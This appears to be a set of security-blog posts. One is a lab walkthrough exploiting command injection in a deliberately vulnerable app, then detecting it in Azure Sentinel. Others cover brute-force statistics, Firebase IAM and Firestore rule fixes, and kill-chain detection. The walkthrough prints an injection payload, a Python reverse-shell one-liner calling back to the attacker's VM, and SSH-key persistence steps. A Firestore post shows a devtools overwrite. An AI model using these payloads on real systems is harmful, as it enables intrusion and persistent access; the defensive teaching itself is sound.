Can Chuck Norris detect the hackers in his home folder?

Let’s set up a server to run Vulnerable Norris. An attacker discovers that the web application has a remote command injection vulnerability, and exploits it to gain a reverse shell. The attackers copy their own SSH public keys onto the device, and uses it as a foothold in the network. How can we detect and stop this from happening, even if we don’t know that the application itself has a vulnerability?

Here’s a summary of attack activities in different phases from the Lockheed-Martin kill-chain model. We will see that a lot of these opportunities for detection are not used out of the box in typical security tooling, and that an attacker can be relatively blunt in the choice of methods without creating alerts.

PhaseAttacker’s actionsArtifacts produced
ReconEndpoint scanning, spidering, payload probingAccess logs Application logs
WeaponizationPlan reverse shell to useApplication logs
DeliveryPayload submitted through application’s injection pointCommand line input
ExploitationCommand line input, create reverse shellNetwork traffic Audit logs
InstallationWebshell injection Add SSH keysChanged files on system
Command and controlUse access method established to perform actionsNetwork connections Audit logs
Actions on objectiveSoftware installation Network reconnessaince Data exfiltrationNetwork connections
Audit logs
Attack phases and expected artifacts generated

Deploying on an Azure Linux VM

We will deploy Vulnerable Norris on a Linux VM on Azure. Our detection strategy is to enable recommended security tooling in Azure, such as Microsoft Defender for Cloud, and to forward Syslog data to Sentinel. It is easy to think that an attack like the one above would light up with alerts relatively early, but as we will see this is not the case, at least not out of th box.

First we deploy a VM using the Azure CLI.

az vm create --name victimvm --group security-experiments --location norwayeast --image UbuntuLts --admin-username donkeyman --generate-ssh-keys

Now we have a standard VM with SSH access. By default it has port 22 open for SSH access. We will open another port for the application:

az vm open-port --name victimvm -g security-experiments --port 3000

We remote into the server with

ssh donkeyman@<ip-address-here>

Then we pull the Vulnerable Norris app in from Github and install it according to the README description. We need to install a few dependencies first:

sudo apt install npm jq

git clone https://github.com/hakdo/vulnerablenorris.git

cd vulnerablenorris

npm install

node index.js &

OK, our server is up and running at <ip-address>:3000.

Turning on some security options

Let’s enable Defender for Cloud. According to the documentation,  this should

  • Provide continuous assessment of security posture
  • Make recommendations for hardening – with a convenient “fix now” button
  • With the enhanced security features enabled, Defender for Cloud detects threats to your resources and workloads.

This sounds awesome – with the flick of a switch our Norris should be pretty secure, right?

Turns out there are more switches: you can turn on an EDR component called Defender for Server. That’s another switch to flick. It is not always clear when you have enabled enough features to be “safe enough”, and each  new service enabled will add to the bill.

A very basic security measure that we have turned on, is to forward syslog to a SIEM. We are using Microsoft Sentinel for this. This allows us to create alerts based on log findings, as well as to search the logs through a simple interface, without logging on to the actual VM to do this. Alerts from Defender for Cloud are also set up to be forwarded to Sentinel, and an incident can be managed from both places and will synchronize.

The attack

The attacker comes from another planet – or at least another cloud. We are setting up a VM in Google Cloud. We will use this one to stage the attack by setting up a listener first to return a reverse shell from our VictimVM. Then we will generate SSH keys on the attacker’s server, and add the public key from here to VictimVM. Now we can log in over SSH from the GCP VM to VictimVM on Azure whenever we want. The key question is:

  • Does Defender for Cloud stop us?
  • Does it at least create an alert for us

We temporarily got the service up and running, exposing port 3000.

screenshot
Vulnerable app running in an Azure VM.

Going to the app gives us a Chuck Norris fact from the Chuck Norris API. We have implemented a very poor implementation of this, calling the API using curl and using a system call from the web application, at the endpoint /dangerzone. This one has a parsing error that allows command injection.

Norris app with demo of remote command injection using “whoami”

The payload is

/dangerzone?category=fashion%26%26whoami

The output shows that we have command injection, and that the app is running as the user donkeyvictim. Now we can get a reverse shell to secure a bit more convenient access to the box. We have set up the VM to listen to port 3333, and use the following reverse shell payload generated by Online – Reverse Shell Generator (revshells.com):

python3%20-c%20'import%20os,pty,socket;s=socket.socket();s.connect((%2234.88.132.129%22,3000));%5Bos.dup2(s.fileno(),f)for%20f%20in(0,1,2)%5D;pty.spawn(%22sh%22)'

On the GCP VM we get an incoming connection:

reverse shell with netcat
Simple reverse shell received using netcat listener

Running ls shows that we are indeed in a reverse shell, but it is very crude. We can upgrade the shell using a neat Python trick from this page:

python3 -c 'import pty;pty.spawn("/bin/bash")'

The blog I took this from has a lot of tweaks you can do to get full autocomplete etc through the netcat listener, but this will do for a bit nicer experience.

What we now do on the attacker VM is to generate an SSH keypair. We then copy the public key to the authorized_keys file for user donkeyvictim on the VictimVM using our reverse shell. We now have established a persistent access channel.

Upgraded shell: the attacker’s console on GCP cloud shell, connected to VictimVM on Azure over SSH.

We obviously see that this activity was not stopped by Microsoft’s Defender for Cloud. But did it at least create some alerts for us? It seems the answer to that is “nope”.

If we turn to Microsoft Sentinel, there are also no incidents or alerts related to this activity.

Checking the logs

Can we then see it in the logs? We know at least that authentication events over SSH will create auth log entries. Since we have set up the Syslog connector in Sentinel, we get the logs into a tool that makes searching easier. The following search will reveal which IP addresses have authenticated with a publickey, and the username it has authenticated with.

Syslog

| where Computer == "victimvm"

| where SyslogMessage contains "Accepted publickey for"

| extend ip = extract("([0-9]+.[0-9]+.[0-9]+.[0-9]+)",1,SyslogMessage)

| extend username = extract("publickey for ([a-zA-Z0-9@!]+)",1,SyslogMessage)

| project TimeGenerated, username, ip

The output from this search is as follows:

sentinel log analysis
Showing the same user logging in with ssh from two different ip addresses.

Here we see that the same user is logging in from two different IP addresses. Enriching it with geolocation data could make the suspicious login easier to detect, as the 212… Is in Norway, and the 34… Is a Google owned ip address in Finland.

In other words: it is possible to detect unusual login acticity by creating queries in Sentinel. At least it is something.

How could we have detected the attack?

But what about all the things leading up to the SSH login? We should definitly be able to stop this at an earlier point.

  1. The payload sent to the application
  2. The network egress when the reverse shell is generated
  3. The change of the ~/.ssh/authorized_keys file

Because the application does not log messages anywhere but stdout, they are not captured anywhere.  It would have been good if the application logged issues to a standard location that could be forwarded.

Detecting the attack when the reverse shell is generated is a good option. Here we can use the VMConnection data provided by the Defender for Cloud agent running on the VM.

VMConnection

| where Computer has "victimvm"

| where Direction == "outbound"

| summarize count() by DestinationPort

Here we look at which destination prots we see in egress traffic. Reverse shells will often use ports not requiring sudo rights, ie above 1000.

Count of outbound connections per destination port

We see we have outbound connections to port 3000. Looking into one of the log items we find some interesting information:

TimeGenerated [UTC]2022-01-18T19:58:20.211Z 
 Computervictimvm
 Directionoutbound
 ProcessNamepython3
 SourceIp10.0.0.4
 DestinationIp34.88.132.129
 DestinationPort3000
 Protocoltcp
 RemoteIp34.88.132.129
 RemoteLongitude28.21
 RemoteLatitude61.03
 RemoteCountryFinland

We know that this is our reverse shell. We could then correlate the outbound connection to this IP address with later incoming SSH connection from this IP address. For relatively specific attack events we can in other words create detections. However, we don’t know in advance what persistence option the attacker would go for, or the port number used for the reverse shell.

A good idea would be to list the scenarios we would want to detect, and then build logging practices and correlations to help us create alerts for these incidents.

Can we throw more security at the VM to detect and stop attacks?

One thing Azure supports for VM’s if Defender for Cloud is enabled with “enhanced security” is “just-in-time access” for the VM. You need to pre-authorize access to open for inbound traffic to management ports through the network security group. The result of trying to connect with SSH after enabling it, is a timeout:

After enabling JIT access, our SSH connection times out without pre-approval.

We can now request access over SSH in Azure Portal by going to the VM’s overview page, and then selecting “connect”:

Pre-authorizing SSH access enables it for a defined period.

This will effectively stop an attacker’s persistence tactic but it will not take care of the remote command injection vulnerability.

For a web application we could also put a web application firewall in front of it to reduce the malicious payloads reaching the app. Even better is of course to only run code that has been developed with security in mind.

The key takeaways are:

  1. Log forwarding is gold but you have to use it and set up your own alerts and correlations to make it help stop attacks
  2. Enabling security solutions will help you but it will not take care of security for you. Setting up endpoint security won’t help you if the application code you are running is the problem.
  3. Avoid exposing management ports directly on the internet if possible.

Bears out for honey in the pot: some statistics

This weekend I decided to do a small experiment. Create two virtual machines in the cloud, one running Windows, and one running Linux. The Windows machine exposes RDP (port 3389) to the internet. The Linux machine exposes SSH (port 22). The Windows machines sees more than 10x the brute-force attempts of the Linux machine. 

We capture logs, and watch the logon attempts. Here’s what I wanted to find out: 

  • How many login attempts do we have in 24 hours?
  • What usernames are the bad guys trying with?
  • Where are the attacks coming from?
  • Is there a difference between the two virtual machines in terms of attack frequency?

The VM’s were set up in Azure, so it was easy to instrument them using Microsoft Sentinel. This makes it easy to query the logs and create some simple statistics. 

Where are the bad bears coming from?

Let’s first have a look at the login attempts. Are all the hackers Russian bears, or are they coming from multiple places? 

Windows

On Windows we observed more than 30.000 attempts over 24 hours. The distribution of attacks that the majority came from Germany, then Belarus, followed by Russia and China. We also see that there are some attempts from many countries, all around the globe. 

Logon attempts on a Windows server over 24 hours

Linux

On Linux the situation is similar, although the Chinese bad guys are a lot more intense than the rest of them. We don’t see that massive amount of attacks from Germany on this VM. It is also less popular to attack the Linux VM: only 3000 attempts over 24 hours, about 10% of the number of login attempts observed on the Windows VM. 

Logon attempts on a Linux server over 24 hours

What’s up with all those German hackers?

The German hackers are probably not German, or human hackers. These login attempts are coming from a number of IP addresses known to belong to a known botnet. That is; these are computers in Germany infected with a virus. 

Usernames fancied by brute-force attackers

What are the usernames that attackers are trying to log in with? 

Top 5 usernames on Linux:

Top 5 usernames on Windows: 

We see that “admin” is a popular choice on both servers, which is perhaps not so surprising. On Linux the attackers seem to try a lot of typical service names, for example “ftp” as shown above. Here’s a collection of usernames seen in the logs: 

  • zabbix
  • ftp
  • postgres
  • ansible
  • tomcat
  • git
  • dell
  • oracle1
  • redmine
  • samba
  • elasticsearch
  • apache
  • mysql
  • kafka
  • mongodb
  • sonar

Perhaps it is a good idea to avoid service names as account names, although the username itself is not a protection against unauthorized access. 

There is a lot less of this in the Windows login attempts; here we primarily see variations of “administrator” and “user”. 

Tips for avoiding brute-force attackers

The most obvious way to avoid brute-force attacks from the Internet, is clearly to not put your server on the Internet. There are many design patterns that allow you to avoid exposing RDP or SSH directly on the Internet. For example:

  • Only allow access to your server from the internal network, and set up a VPN solution with multi-factor authentication to get onto the local network remotely
  • Use a bastion host solution, where access to this host is strictly controlled
  • Use an access control solution that gives access through short-lived tokens, requiring multi-factor authentication for token access. Cloud providers have services of this type, such as just-in-time access on Azure or OS Login on GCP.

Firebase IAM: the tale of excessive permissions

Securing Firestore objects from attacks abusing the JavaScript SDK can be done with the Firestore security rules, which you can read about in my recent post on Firestore

If you are using the Admin SDK on the server side, you have full access to everything by default. The Firestore security rules do not apply to the Admin SDK. One thing in particular we should be aware of is that the Firesbase admin SDK gives access to management plane functionality, making it possible to change security rules, for example. This is not apparent from the Firebase console or command line tools. 

firefighters in action
Running Firebase Cloud Functions using the Admin SDK with default permissions can quickly lead to a lot of firefighting. Better get those permissions under control!

In this blog post we dig into a Firebase project through the Google Cloud console and the gcloud command line tool, where we show how to improve the security of our capture-the-flag app by creating specific service accounts and role bindings for a cloud function. We also explore how to verify that a user is signed in using the Firebase Admin SDK.

A threat model for the flag checker

We have created a demo Firebase project with a simple web application at https://quizman-a9f1b.web.app/. This app has a simple CTF function, where a CTF challenge is presented, and players can verify if their identified flag is correct. The data exchange is primarily done using the JavaScript SDK, protected by security rules. For checking the flag, however, we are using a cloud function. If this cloud function has a vulnerability that allows an attacker to take control over it, that attacker could potentially overwrite the “correct flag”, or even change the security rules protecting the JavaScript SDK access. 

Here’s a list of threats and potential consequences: 

VulnerabilityExploitationImpact
RCE vulnerability in codeAttacker can take full control of the Firebase project environment through the admin SDKCan read/write to private collection (cheat)Can create other resources (costs money)Can reconfigure security rules (data leaks or DoS)
Lack of brute-force protectionAttacker can try to guess flags by automating submissionUser can cheatCosts money
Lack of authenticationAn unauthenticated user can perform function callsCosts money in spite of not being a real player of the CTF game

We need to make sure that attackers cannot exploit vulnerabilities to cheat in the program. We also want to protect against unavailability, and abuse that can drive up the cloud usage bill (after all this is a personal project). We will apply a defence-in-depth approach to our cloud function: 

  1. Execution of the function requires the caller to be authenticated. The purpose of this is to limit abuse, and to revoke access to users abusing the app. 
  2. The Firebase function shall only have read access to FIrestore, preferably only to the relevant collections. This will avoid the ability of an attacker with RCE to overwrite data, or to manage resources in the Firebase project.
  3. For the following events we want to create logs and possibly alerts: 
    1. authenticated user verified token
    2. unauthenticated user requested token verification

Requiring the user to be authenticated

First we need to make sure that the person requesting to verify a flag is authenticated. We can use a built-in method of the Firebase admin SDK to do this. This method checks that the ID token received is properly signed, and that it is not expired. The good thing about this approach is that it avoids making a call to the authentication backend.

But what if the token has been revoked? It is possible to check if a token is revoked using either security rules (recommended, cheap), or making an extra call to the authentication backend (expensive, not recommended). Since we are not actively revoking tokens in this app, unless a user changes his/her password, we will not bother with this functionality but if you need it, there is documentation how here: https://firebase.google.com/docs/auth/admin/manage-sessions#detect_id_token_revocation

We need to update our “check flag workflow” from this: 

  • send flag and challenge ID to cloud function
  • cloud function queries Firestore based on challenge ID and gets the “correct flag”
  • cloud function compares submitted flag with the correct flag, and returns {success: true/false} as appropriate

to this slightly more elaborate workflow:

  • send flag, challenge ID and user token to cloud function
  • cloud function verifies token ID
    • If invalid: return 403 (forbidden) // simplified to returning 200 with {success: false}
    • if valid: 
      • cloud function queries Firestore based on challenge ID and gets the “correct flag”
      • cloud function compares submitted flag with the correct flag, and returns {success: true/false} as appropriate

The following code snippet shows how to perform the validation of the user’s token: 

​​const idTokenResult = await admin.auth().verifyIdToken(idToken);

If the token is valid, we receive a decoded jwt back.

Restricting permissions using IAM roles

By default, a Firebase function initiated with the Firebase admin SDK has been assigned very powerful permissions. It gets automatically set up with a service account that is named as “firebase-adminsdk-random5chars@project-id.iam.gserviceaccount.com”. The service account itself does not have rights associated with it, but it has role bindings to roles that have permissions attached to it. 

If you go into the Google Cloud Console, and navigate to “IAM” under your project, you can look up the roles assigned to a principal, such as your service account. For each role you automatically get an assessment of “excess permissions”; those are permissions available through the role bindings but that are not used in the project. Here’s the default configuration for the service account set up for the Admin SDK: 

By default Firebase Cloud Functions run with excessive permissions!

Our Firebase cloud function does not need access to all those permissions. By creating roles that are fit for purpose we can limit the damage an attacker can do if the function is compromised. This is just the same principle in action as when your security awareness training tells you not to run your PC as admin for daily work. 

Cloud resources have associated ready-made roles that one can bind a service account to. For Firestore objects the relevant IAM roles are listed here: https://cloud.google.com/firestore/docs/security/iam. We see that there is a viewer role that allows read access to all Firestore resources, called datastore.viewer. We will use this, but be aware it could read all Firestore data in the project, not only the intended objects. Still, we are protecting against deletion, overwriting data, and creation of new resources. 

Note that it is possible to create more specific roles. We could create a role that only has permission to read from Firestore entities. We cannot in an IAM role describe exactly which Firestore collection to allow read operations from, but if we create the role flagchecker and assign it the permission datastore.entities.get and nothing else, it is as locked down as we can make it. 

To implement this for our cloud function, we create a new service account. This can be done in the Console by going to IAM → Service Accounts → New Service Account. We create the account and assign it the role datastore.viewer. 

Our new service account is called quizman-flag-checker.

Now we need to attach this service account to our Firebase function. It is not clear form the Firebase documentation how we can accomplish this, but opening the Google Cloud Console, or using the gcloud command line tool, we can attach our new service account with more restrictive permissions to the Firebase function. 

To do this, we go into the Google Cloud console, choose the right project and Compute → Cloud functions. Select the right function, and then hit the “edit” button to change the function. Here you can choose the service account you want to attach to the function. 

google cloud console

After changing the runtime service account, we need to deploy the function again. Now the service-to-service authentication is performed with a principal with more sensible permissions; attackers can no longer create their own resources or delete security rules. 

Auditing the security configurations of a Firebase function using gcloud

Firebase is great for an easy set-up, but as we have seen it gives us too permissive roles by default. It can therefore be a good idea to audit the IAM roles used in your project. 

Key questions to ask about the permissions of a cloud function are: 

  • What is the service account this function is authenticating as?
  • What permissions do I have for this cloud function?
  • Do I have permissions that I do not need? 

In addition to auditing the configuration, we want to audit changes to the configuration, in particular changes to service accounts, roles, and role bindings. This is easiest done using the log viewer tools in the Google Cloud console. 

We’ll use the command line tool gcloud for the auditing, since this makes it possible to automate in scripts. 

Service accounts and IAM roles for a Firebase function

Using the Google Cloud command line tool gcloud we can use the command 

gcloud functions describe <functionName>

to get a lot of metadata about a function. To extract just the service account used you can pipe it into jq like this: 

gcloud functions describe <functionName> --format=”json”| jq “.serviceAccountEmail”

When we have the service account, we can next check which roles are bound to the account. This query is somewhat complex due to the nested data structure for role bindings on a project (for a good description of gcloud IAM queries, see fabianlee.org): 

gcloud projects get-iam-policy <projectIdNumber> --flatten="bindings[].members" --filter="bindings.members=serviceAccount:<account-email>" --format="value(bindings.role)"

Running this gives us the following role (as expected): projects/quizman-a9f1b/roles/flagchecker.

Hence, we know this is the only role assigned to this service account. Now we finally need to list the permissions for this role. Here’s how we can do that: 

cloud iam roles describe flagchecker --project=quizman-a9f1b --format="value(includedPermissions)”

The output (as expected) is a single permission: datastore.entities.get

Firebase: Does serverless mean securityless?

Do you like quizzes or capture the flag (CTF) exercises? Imagine we want to build a platform for creating a capture the flag exercise! We need the platform to present a challenge. When users solve the challenge, they find a “flag”, which can be a secret word or a random string. They should then be able to submit the flag in our CTF platform and check if it is correct or not. 

Red flag
Capture the flag can be fun: looking for a hidden flag whether physically or on a computer

To do this, we need a web server to host the CTF website, and we need a database to store challenges. We also need some functionality to check if we have found the right flag. 

Firebase is a popular collection of serverless services from Google. It offers various easy to use solutions for quickly assembling applications for web or mobile, storing data, messaging, authentication, and so on. If you want to set up a basic web application with authentication and data storage without setting up backends, it is a good choice. Let’s create our CTF proof-of-concept on Firebase using Hosting + Firestore for data storage. Good for us, Google has created very readable documentation for how to add Firebase to web projects.

Firestore is a serverless NoSQL database solution that is part of Firebase. There are basically two ways of accessing the data in Firebase: 

  • Directly from the frontend. The data is protected by Firestore security rules
  • Via an admin SDK meant for use on a server. By default the SDK has full access to everything in Firestore

We don’t want to use a server, so we’ll work with the JavaScript SDK for the frontend. Here are the user stories we want to create: 

  • As an organizer I  want to create a CTF challenge in the platform and store it in Firebase so other users can find it and solve the challenge
  • As a player I want to view a challenge so that 
  • As a player I want to create a form to submit a flag to check that it is correct

We want to avoid using a server, and we are simply using the JavaScript SDK. Diagrams for the user stories are shown below.

User stories
User stories for a simple CTF app example

What about security?

Let’s think about how attackers could abuse the functionalities we are trying to create. 

Story 1: Create a challenge

For the first story, the primary concern is that nobody should be able to overwrite a challenge, including its flag. 

Each challenge gets a unique ID. That part is taken care of by Firestore automatically, so an existing challenge will not be overwritten by coincidence. But the ID is exposed in the frontend, and so is the project metadata. Could an attacker modify an existing record, for example its flag, by sending a “PUT” request to the Firestore REST API?

Let’s say we have decided a user must be authenticated to create a challenge, and implemented this by the following Firebase security rule

match /challenges/{challenges} {
      allow read, write: if request.auth != null;
}

Hacking the challenge: overwriting data

This says nothing about overwriting existing data. It also has no restriction on what data the logged in user has access to – you can both read and write to challenges, as long as you are authenticated. Here’s how we can overwrite data in Firestore using set.

Of course, we need to test that! We have created a simple example app. You need to log in (you can register an account if you want to), and go to this story description page: https://quizman-a9f1b.web.app/challenges/challenge.html#wnhnbjrFFV0O5Bp93mUV

screenshot

This challenge has the title “Fog” and description “on the water”. We want to hack this as another user directly in the Chrome dev tools to change the title to “Smoke”. Let’s first register a new user, cyberhakon+dummy@gmail.com and log in. 

If we open devtools directly, we cannot find Firebase or similar objects in the console. That is because the implementation uses SDV v.9 with browser modules, making the JavaScript objects contained within the module. We therefore need to import the necessary modules ourselves. We’ll first open “view source” and copy the Firebase metadata. 

const firebaseConfig = {
            apiKey: "<key>",
            authDomain: "quizman-a9f1b.firebaseapp.com",
            projectId: "quizman-a9f1b",
            storageBucket: "quizman-a9f1b.appspot.com",
            messagingSenderId: "<id>",
            appId: "<appId>",
            measurementId: "<msmtId>"
        };

We’ll simply paste this into the console while on our target challenge page. Next we need to import Firebase to interact with the data using the SDK. We could use SDK v.8 that is namespaced, but we can stick to v.9 using dynamic imports (works in Chrome although not yet a standard): 

import('https://www.gstatic.com/firebasejs/9.6.1/firebase-app.js').then(m => firebase = m)

and 

import('https://www.gstatic.com/firebasejs/9.6.1/firebase-firestore.js').then(m => firestore = m)

Now firestore and firebase are available in the console. 

First, we initalize the app with var app = firebase.initializeApp(firebaseConfig), and the database with var db  = firestore.getFirestore().  Next we pull information about the challenge we are looking at: 

var mydoc = firestore.doc(db, "challenges", "wnhnbjrFFV0O5Bp93mUV");
var docdata = await firestore.getDoc(mydoc);

This works well. Here’s the data returned: 

  • access: “open”
  • active: true
  • description: “on the water”
  • name: “Fog”
  • owner: “IEiW8lwwCpe5idCgmExLieYiLPq2”
  • score: 5
  • type: “ctf”

That is also as intended, as we want all users to be able to read about the challenges. But we can probably use setDoc as well as getDoc, right? Let’s try to hack the title back to “Smoke” instead of “Fog”. We use the following command in the console: 

var output = await firestore.setDoc(mydoc, {name: “Smoke”},{merge: true})

Note the option “merge: true”. Without this, setDoc would overwrite the entire document. Refreshing the page now yields the intended result for the hacker!

screenshot

Improving the security rules

Obviously this is not good security for a very serious capture-the-flag app. Let’s fix it with better security rules! Our current rules allows anyone who is authenticated to read data, but also to write data. Write here is shorthand for create, update, and delete! That means that anyone who is logged in can also delete a challenge. Let’s make sure that only owner can modify documents. We keep the rule for reading to any logged in user, but change the rule for writing to the following:

Safe rule against malicious overwrite:

allow write: if request.auth != null && request.auth.uid == resource.data.owner;

This means that authenticated users UID must match the “owner” field in the challenge. 

Note that the documentation here shows a method that is not safe – these security rules can be bypassed by any authenticated user: https://firebase.google.com/docs/firestore/security/insecure-rules#content-owner-only

(Read 4 January 2022)

Using the following security rules will allow anyone to create, update and delete data because the field “author_id” can be edited in the request directly. The comparison should be done as shown above, against the existing data for update using resource.data.<field_name>. 

service cloud.firestore {
  match /databases/{database}/documents {
    // Allow only authenticated content owners access
    match /some_collection/{document} {
      allow read, write: if request.auth != null && request.auth.uid == request.resource.data.author_uid
    }
  }
}
// Example from link quoted above

There is, however, a problem with the rule marked “SAFE AGAINST MALICIOUS UPDATES” too; it will deny creation of new challenges! We thus need to split the write condition into two new rules, one for create (for any authenticated user), and another one for update and delete operations. 

The final rules are thus: 

allow read, create: if request.auth != null;
allow update, delete: if request.auth != null && request.auth.uid == resource.data.owner;

Story 2: Read the data for a challenge

When reading data, the primary concern is to avoid that someone gets access to the flag, as that would make it possible for them to cheat in the challenge. Security rules apply to documents, not to fields in a document. This means that we cannot store a “secret” inside a document; access is an all or nothing decision. However, we can create a subcollection within a document, and apply separate rules to that subdocument. We have thus created a data structure like this: 

screenshot of firestore data structure

Security rules are hierarchical, so we need to apply rules to /challenges/{challenge}/private/{document}/ to control access to “private”. Here we want the rules to allow only “create” a document under “private” but not to change it, and also not to read it. The purpose of blocking reading of the “private” documents is to avoid cheating. 

But how can we then compare a player’s suggested flag with the stored one? We can’t in the frontend, and that is the point. We don’t want to expose the data in on the client side. 

Story 3: Serverless functions to the rescue

Because we don’t want to expose the flag from the private subcollection in the frontend, we need a different pattern here. We will use Firebase cloud functions to do that. This is similar to AWS’ lambda functions, just running on GCP/Firebase instead. For our Firestore security, the important aspect is that a cloud function running in the same Firebase project has full access to everything in Firestore, and the security rules do not apply to the admin SDK used in functions. By default a cloud function is assigned an IAM role that gives it this access level. For improved security one can change the roles so that you allow only the access needed for each cloud function (here: read data from Firestore). We haven’t done that here, but this would allow us to improve security even further. 

Serverless security engineering recap

Applications don’t magically secure themselves in the cloud, or by using serverless. With serverless computing, we are leaving all the infrastructure security to the cloud provider, but we still need to take care of our workload security. 

In this post we looked at access control for the database part of a simple serverless web application. The authorization is implemented using security rules. These rules can be made very detailed, but it is important to test them thoroughly. Misconfigured security rules can suddenly allow an attacker to bypass your intended control. 

Using Firebase, it is not obvious from the Firebase Console how to set up good application security monitoring and logging. Of course, that is equally important when using serverless as other types of infrastructure, both for detecting attacks, and for forensics after a successful breach. You can set up monitoring Google Cloud Monitoring for Firebase resources, including alerts for events you want to react to. 

As always: basic security principles still hold with serverless computing!

How to discover cyberattacks in time to avoid disaster

Without IT systems, modern life does not exist. Whether we are turning on our dishwasher, ordering food, working, watching a movie or even just turning the lights on, we are using computers and networked services. The connection of everything in networks brings a lot of benefits – but can also make the infrastructure of modern societies very fragile.

Bus stop with networked information boards
Cyber attacks can make society stop. That’s why we need to stop the attackers early in the kill-chain!

When society moved online, so did crime. We hear a lot about nation state attacks, industrial espionage and cyber warfare, but for most of us, the biggest threat is from criminals trying to make money through theft, extortion and fraud. The difference from earlier times is that we are not only exposed to “neighborhood crime”; through the Internet we are exposed to criminal activities executed by criminals anywhere on the planet. 

We see in media reports every week that organizations are attacked. They cause serious disruptions, and the cost can be very high. Over Christmas we had several attacks happening in Norway that had real consequences for many people: 

  • Nortura, a cooperative owned by Norwegian farmers that processes meat and eggs, was hit by a cyber attack that made them take many systems offline. Farmers could not deliver animals for slaughtering, and distribution of meat products to stores was halted. This is still the situation on 2 January 2022, and the attack was made public on 21 December 2021. 
  • Amedia, a media group publishing mostly local newspapers, was hit with ransomware. The next 3 days following the attack on the 28th of December, most of Amedia’s print publications did not come out. They managed to publish some print publications through collaboration with other media houses. 
  • Nordland fylkeskommune (a “fylkeskomune” is a regional administrative level between municapalities and the central government in Norway) and was hit with an attack on 23 December 2021. Several computer systems used by the educational sector have been taken offline, according to media reports. 

None of the reports mentioned above have been linked to the log4shell chaos just before Christmas. The Amedia incident has been linked to the Printer Nightmare vulnerability that caused panic earlier in 2021. 

What is clear is that there is a serious and very real threat to companies from cyber attacks – affecting not only the companies directly, but entire supply chains. The three attacks mentioned above all happened within two weeks. They caused disruption of people’s work, education and media consumption. When society is this dependent on IT systems, attacks like these have real consequences, not only financially, but to quality of life.

This blog post is about how we can improve our chances of detecting attacks before data is exfiltrated, before data is encrypted, before supply chains collapse and consumers get angry. We are not discussing what actions to take when you detect the attack, but we will assume you already have an incident response plan in place.

How an attack works and what you can detect

Let’s first look at a common model for cyber attacks that fit quite well with how ransomware operators execute; the cyber kill-chain. An attacker has to go through certain phases to succeed with an attack. The kill-chain model uses 7 phases. A real attack will jump a bit back and forth throughout the kill-chain but for discussing what happens during the attack, it is a useful mental model. In the below table, the phases marked in yellow will often produce detectable artefacts that can trigger incident response activities. The blue phases of weaponization (usually not detectable) and command & control, actions on objectives (too late for early response) are not discussed further. 

Defensive thinking using a multi-phase attack model should take into account that the earlier you can detect an attack, the more likely you are to avoid the most negative consequences. At the same time, the earlier phases give you detections with more uncertainty, so you do risk initiating response activities that can hurt performance based on false positives. 

Detecting reconnaissance

Before the attack happens, the attacker will identify the victim. For some attacks this is completely automated but serious ransomware attacks are typically human directed and will involve some human decision making. In any case, the attacker will need to know some things about your company to attack it. 

  • What domain names and URL’s exist?
  • What technologies are used, preferably with version numbers so that we can identify potential vulnerabilities to exploit?
  • Who are the people working there, what access levels do they have and what are their email addresses? This can be used for social engineering attacks, e.g. delivering malicious payloads over email. 

These activities are often difficult to detect. Port scans and vulnerability scans of internet exposed infrastructure are likely to drown in a high number of automated scans. Most of these are happening all the time and not worth spending time reacting to. However, if you see unusual payloads attempted, more thorough scans, or very targeted scans on specific systems, this can be a signal that an attacker is footprinting a target. 

Other information useful to assess the risk of an imminent attack would be news about attacks on other companies in the same business sector, or in the same value chain. Also attacks on companies using similar technical set-ups (software solutions, infrastructure providers, etc) could be an early warning signal. In this case, it would be useful to prepare a list of “indicators of compromise” based on those news reports to use for threat hunting, or simply creating new alerts in monitoring systems. 

Another common indicator that footprinting is taking place, is an increase in the number of social engineering attempts to elicit information. This can be over phone, email, privacy requests, responses to job ads, or even in person. If such requests seem unusual it would be useful for security if people would report it so that trends or changes in frequency can be detected. 

Detecting delivery of malicious payloads

If you can detect that a malicious payload is being delivered you are in a good position to stop the attack early enough to avoid large scale damage. The obvious detections would include spam filters, antivirus alerts and user reports. The most common initial intrusion attack vectors include the following: 

  • Phishing emails (by far the most common)
  • Brute-force attacks on exposed systems with weak authentication systems
  • Exploitation of vulnerable systems exposed to the Internet

Phishing is by far the most common attack vector. If you can reliably detect and stop phishing attacks, you are reducing your risk level significantly. Phishing attacks usually take one of the following forms: 

  • Phishing for credentials. This can be username/password based single-factor authentication, but also systems protected by MFA can be attacked with easy to use phishing kits. 
  • Delivery of attachments with malicious macros, typically Microsoft Office. 
  • Other types of attachments with executable code, that the user is instructed to execute in some way

Phishing attacks create a number of artefacts. The first is the spam filter and endpoint protection; the attacker may need several attempts to get the payload past first-line of defences. If there is an increase in phishing detections from automated systems, be prepared for other attacks to slip past the filters. 

The next reliable detection is a well-trained workforce. If people are trained to report social engineering attempts and there is an easy way to do this, user reports can be a very good indicator of attacks. 

For brute-force attacks, the priority should be to avoid exposing vulnerable systems. In addition, creating alerts on brute-force type attacks on all exposed interfaces would be a good idea. It is then especially important to create alerts to successful attempts. 

For web applications, both application logs and WEF logs can be useful. The main problem is again to recognize the attacks you need to worry about in all the noise from automated scans. 

Detecting exploitation of vulnerabilities

Attackers are very interested in vulnerabilities that give them access to “arbitrary code execution”, as well as “escalation of privileges”. Such vulnerabilities will allow the attacker to install malware and other tools on the computer targeted, and take full control over it. The primary security control to avoid this, is good asset management and patch management. Most attacks are exploiting vulnerabilities where a patch exists. This works because many organizations are quite late at patching systems. 

A primary defense against exploitation of known vulnerabilities is endpoint protection systems, including anti-virus. Payloads that exploit the vulnerabilities are recognized by security companies and signatures are pushed to antivirus systems. Such detections should thus be treated as serious threat detections. It is all well and good that Server A was running antivirus that stopped the attack, but what if virus definitions were out of date on Server B?

Another important detection source here would be the system’s audit logs. Did the exploitation create any unusual processes? Did it create files? Did it change permissions on a folder? Log events like this should be forwarded to a tamper proof location using a suitable log forwarding solution. 

To detect exploitation based on log collection, you will be most successful if you are focusing on known vulnerabilities where you can establish patterns that will be recognizable. For example, if you know you have vulnerable systems that cannot be patched for some reason, establishing specific detections for exploitation can be very very valuable. For tips on log forwarding for intrusion detection in Windows, Microsoft has issued specific policy recommendations here

Detecting installation (persistence)

Detecting installation for persistence is usually quite easy using native audit logs. Whenever a new service is created, a scheduled task is created, or a cron job, an audit log entry should be made. Make sure this is configured across all assets. Other automated execution patterns should also be audited, for example autorun keys in the Windows registry, or programs set to start automatically when a user logs in.

Another important aspect is to check for new user accounts on the system. Account creation should thus also be logged. 

